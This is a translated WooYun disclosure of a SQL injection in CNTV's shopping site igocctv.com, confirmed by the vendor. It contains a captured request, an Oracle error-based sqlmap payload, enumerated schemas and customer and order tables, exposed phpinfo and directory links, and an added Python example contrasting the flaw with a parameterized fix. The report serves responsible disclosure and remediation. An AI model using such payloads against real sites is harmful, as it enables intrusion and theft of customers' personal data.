
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-050464

Title: A site of China Network Television (CNTV) has a SQL injection vulnerability leading to information disclosure

Vendor: China Network Television (CNTV)

Author: Mr.leo

Submitted: 2014-02-08 16:36

Fix deadline: 2014-03-25 16:37

Public disclosure: 2014-03-25 16:37

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-02-08: Details sent to the vendor, awaiting vendor handling
2014-02-08: Vendor confirmed; details disclosed to the vendor only
2014-02-18: Details disclosed to core white hats and domain experts
2014-02-28: Details disclosed to regular white hats
2014-03-10: Details disclosed to intern white hats
2014-03-25: Details disclosed to the public

Brief description:

A site of China Network Television (CNTV) has a SQL injection vulnerability leading to information disclosure.

Detailed description:

Site:
http://www.igocctv.com (the official TV-shopping site of China Central Television)
The slectdate parameter is not filtered, which leads to a SQL injection vulnerability.
Request captured with Burp:

POST /igo/manage/live/getLiveList HTTP/1.1
Content-Length: 15
Content-Type: application/x-www-form-urlencoded
Referer: http://www.igocctv.com
Cookie: JSESSIONID=749C6635D1F70F5781CA442E272B02B5
Host: www.igocctv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
slectdate=1
Running sqlmap:
sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
---
Place: POST
Parameter: slectdate
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: slectdate=1') AND 6267=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(98)||CHR(109)||CHR(114)||CHR(58)||(SELECT (CASE WHEN (6267=6267) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(108)||CHR(121)||CHR(114)||CHR(58)||CHR(62))) FROM DUAL) AND ('dcVr'='dcVr
---
current user: 'IGO086'
current schema (equivalent to database on Oracle): 'IGO086'
available databases [8]:
[*] CTXSYS
[*] ET1_TV
[*] EXFSYS
[*] IGO086
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
156 tables:
Database: IGO086
[159 tables]
The data volume is quite large:
Database: IGO086
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| ORDE_ORDER_DETAIL | 2684436 |
| ORDE_ORDERS | 2568788 |
| MEMB_DELIVER_ADDRESS | 1638637 |
| PERM_AUTHN_MEMBER | 1502375 |
| MEMB_ARCHIVE | 1502372 |
| MEMB_ARCHIVE_BAK | 636391 |
| REPO_COMMODITY_HISTORY | 367781 |
| COMM_NAME_SEARCH | 164282 |
| REPO_COMMODITY_ATTRIBUTE | 108712 |
| COMM_NAME_SEARCH_20130306 | 95978 |
| COMM_RELATIVE_COMMODITY | 71758 |
| ORDE_STATUS_CHANGE | 67977 |
| PERM_AUTHN_USER | 47370 |
| ORDE_PAYMENT_LOG | 42509 |
| MARK_LIVE_TELECAST | 29867 |
| ORDE_INTERFACE_LOG | 20402 |
| COMM_CATEGORY_COMMODITY | 13710 |
| COMM_COMMODITY | 12329 |
| COMM_PLAN_TASK | 10864 |
| MEMB_FAVORITE | 10743 |
| MEMB_EMAIL_CANCEL | 10378 |
| COMM_IMAGE | 10160 |
| COMM_EXTENSION_ATTRIBUTE | 9846 |
| COMM_COMMODITY_BAK_20130325 | 7772 |
| TCRM_CUSTOMER3 | 6979 |
| REPO_COMMODITY_HISTORY2 | 6476 |
| DELETE_CUSTOMER | 5047 |
| MARK_CONSULTATION | 4168 |
| COMM_SUBJECT_COMMODITY | 2939 |
| MARK_STRONG_PREORDER | 2454 |
| COMM_SUBJECT | 1572 |
| MEMB_INTERFACE_LOG | 1455 |
| ADDRESS_INTERFACE_LOG | 1424 |
| COMM_SUPPLIER | 1173 |
| COMM_RECOMMEND_COMMODITY | 870 |
| ADS_LINK_TASK | 837 |
| COMM_STYLE | 694 |
| MARK_ARRIVAL_NOTICE | 678 |
| COMM_ATTRIBUTE_LISTS | 652 |
| MEMB_DELIVER_ADDRESS2 | 634 |
| ORDE_CHINAPAY_PAYMENT | 618 |
| MEMB_CATALOG_DELIVERY_ADDRESS | 493 |
| COMM_CATEGORY | 358 |
| MANA_PAGES | 351 |
| MARK_LIVE_STRONG | 326 |
| COMM_COMMODITY_BACKUP | 286 |
| COMM_COLOUR | 279 |
| MARK_SPECIAL_TOPIC | 220 |
| CLIENT_COUNT | 219 |
| COMM_CONFIGURE_SUB | 202 |
| COMM_QUERY_CONFIGURE | 194 |
| COMM_LABEL_COMMODITY | 160 |
| COMM_GROUP_BUY | 154 |
| ORDE_RESCISSION | 141 |
| COMM_SUBJECT_ATTRIBUTE | 136 |
| COMM_PHONE_LABEL_COMMODITY | 133 |
| PERM_AUTHZ_USER_ROLE | 127 |
| AAA | 117 |
| PERM_AUTHN_MANAGER | 113 |
| COMM_ATTRIBUTE_ITEM | 108 |
| REPO_ATTRIBUTE_LIST | 108 |
| ORDE_ORDERS_TEMP | 102 |
| REPO_ROLE_GROUP | 99 |
| PERM_AUTHZ_ROLE_RESOURCE | 76 |
| MARK_NEWS | 72 |
| PERM_AUTHZ_RESOURCE | 60 |
| COMM_TYPE | 56 |
| QRTZ_SYNC_TIMESTAMP | 54 |
| BASE_CONFIG | 51 |
| COMM_COMMODITY_ORDER | 39 |
| MARK_COMMODITY_EVALUATION | 37 |
| REPO_CARD_CATEGORY | 35 |
| REPO_CARD_TYPE | 31 |
| MEMB_FEEDBACK_NOTES | 29 |
| MANA_PAGE_PROMPT | 26 |
| COMM_INDEX_LABEL | 25 |
| TOAD_PLAN_TABLE | 21 |
| COMM_BRAND | 19 |
| PERM_AUTHZ_ROLE | 17 |
| REPO_GROUP | 16 |
| BASE_CODE | 14 |
| COMM_QUERY_INTERVAL | 14 |
| COMM_PHONE_IMAGE | 12 |
| COMM_LABEL | 11 |
| QRTX_TRIGGER | 11 |
| QRTX_SCHEDULER | 10 |
| QRTX_TASK | 10 |
| MEMB_BLACKLIST_HISTORY | 9 |
| COMM_EIGHT_TASK | 8 |
| MARK_COUPONNUMBER_RELATION | 8 |
| COMM_INTERVAL_SUB | 7 |
| MEMB_LEVEL | 6 |
| ORDE_BANK_SET | 6 |
| QRTZ_LOCKS | 5 |
| REPO_ROLE | 5 |
| MEMB_BLACKLIST | 4 |
| BASE_TIME_SET | 3 |
| COMM_LABEL_TYPE | 3 |
| TOAD_PLAN_SQL | 2 |
| COMM_TYPE_BRAND | 1 |
| QRTX_TASK_TYPE | 1 |
| QRTX_TRIGGER_TYPE | 1 |
+-------------------------------+---------+


Fields in the user table (screenshot 348.jpg, not reproduced here)


phpinfo information:
http://www.igocctv.com/phpinfo.php
As a bonus, directory listing and phpinfo on another site:
http://202.108.16.191/i.php
http://202.108.16.191/public/images/
Done.

Proof of vulnerability:

Already demonstrated above.

Fix recommendations:

1# Filter the parameter
2# Mask sensitive information
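The two fix points above, as an added example that is not part of the original report or the site's own code: a query that pastes slectdate into the SQL text the way the report describes, beside a hardened version that allow-lists the value's shape and binds it as a parameter. SQLite stands in for the Oracle backend, and the table layout and the accepted value shape are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the live-schedule table behind
# /igo/manage/live/getLiveList; the real schema is not known from the report.
SAMPLE_ROWS = [
    (1, "1", "Morning show"),
    (2, "1", "Evening show"),
    (3, "2", "Weekend special"),
]

def make_db():
    """Create an in-memory SQLite database holding the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE live_list (id INTEGER, showday TEXT, title TEXT)")
    con.executemany("INSERT INTO live_list VALUES (?, ?, ?)", SAMPLE_ROWS)
    return con

def get_live_list_vulnerable(con, slectdate):
    """The flaw the report describes: slectdate is concatenated into the SQL text.

    The quote-and-paren structure matches the sqlmap payload on the page
    (1') ... AND ('x'='x), so whatever the client sends becomes SQL.
    """
    sql = "SELECT id, title FROM live_list WHERE (showday = '" + slectdate + "')"
    return con.execute(sql).fetchall()

def get_live_list_fixed(con, slectdate):
    """Hardened form: allow-list the value's shape, then bind it as a parameter.

    Accepting a short digit string (as in the captured request) is an
    assumption; the point is that the value never becomes part of the SQL text.
    """
    if not re.fullmatch(r"\d{1,4}", slectdate):
        raise ValueError("slectdate must be a short digit string")
    sql = "SELECT id, title FROM live_list WHERE (showday = ?)"
    return con.execute(sql, (slectdate,)).fetchall()

if __name__ == "__main__":
    con = make_db()
    probe = "1') OR ('1'='1"  # constructed value in the page's payload shape
    print(get_live_list_vulnerable(con, "1"))    # the 2 rows for day 1, as intended
    print(get_live_list_vulnerable(con, probe))  # all 3 rows: the WHERE clause was rewritten
    print(get_live_list_fixed(con, "1"))         # the same 2 rows
    try:
        get_live_list_fixed(con, probe)
    except ValueError as exc:
        print("rejected:", exc)                  # the probe never reaches the database
```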

Copyright notice: please credit the source when reposting: Mr.leo@WooYun


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-02-08 16:55

Vendor reply:

Thank you very much, we will rectify this service as soon as possible!~~ Thank you for your support and help!~~~

Latest status:

None yet

